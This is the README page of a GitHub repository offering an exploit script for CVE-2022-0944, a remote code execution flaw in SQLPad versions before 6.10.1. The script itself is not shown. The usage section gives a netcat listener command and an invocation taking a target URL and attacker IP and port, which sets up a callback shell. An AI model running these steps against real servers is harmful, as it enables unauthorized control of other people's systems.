Skip to content

0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

SQLPad RCE Exploit

This repository contains an exploit script for CVE-2022-0944 in SQLPad, a vulnerability that allows for Remote Code Execution (RCE) via the /api/test-connection endpoint.

Overview

The provided script (exploit.py) demonstrates how to exploit the RCE vulnerability in SQLPad. The script sends a payload to the vulnerable endpoint, executing a command on the target server.

Features

  • Blind RCE: Executes commands on the target server without receiving direct responses.
  • Netcat Listener: Requires a netcat listener setup on the attacker's machine to receive outputs.

Prerequisites

  • Python 3.x
  • requests library (can be installed via pip)

Usage

  1. Setup a Netcat Listener
nc -lvnp 4444

Run the Exploit

python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>

Affected Versions

  • Up to (excluding) 6.10.1

References

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

10 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages